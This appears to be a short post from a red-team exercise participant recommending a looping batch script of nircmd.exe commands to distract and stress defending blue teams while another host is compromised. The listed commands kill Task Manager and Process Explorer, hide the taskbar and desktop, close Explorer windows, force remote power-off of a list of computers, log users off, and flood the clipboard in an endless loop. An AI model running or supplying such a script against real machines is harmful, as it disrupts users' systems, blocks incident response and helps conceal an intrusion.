One of the best ways to throw blue teamers off the scent of another host getting owned, which also has the added effect of stressing them out is a batch script that runs through some of the more annoying features in nircmd.exe in succession and at regular intervals:

  • setdisplay 640x480
  • killprocess taskmgr.exe
  • killprocess procexp.exe
  • win -style title “my computer” 0x00c00000
  • win child title “my computer” +exstyle all 0x00400000
  • win +exstyle title “my computer” 0x00400000
  • win trans ititle “internet explorer” 256
  • win close class “CabinetWClass”
  • multiremote copy “c:tempcomputers.txt” exitwin poweroff force
  • exitwin logoff
  • standby
  • monitor off
  • win child class “Shell_TrayWnd” hide class “button”
  • win hide class progman

Just to name a few…

another fun batch script to have running is ‘echo knock knock | clip’ in an endless and delayless loop. (I makes ‘knock knock’ the only thing that will ever be pasted ;-)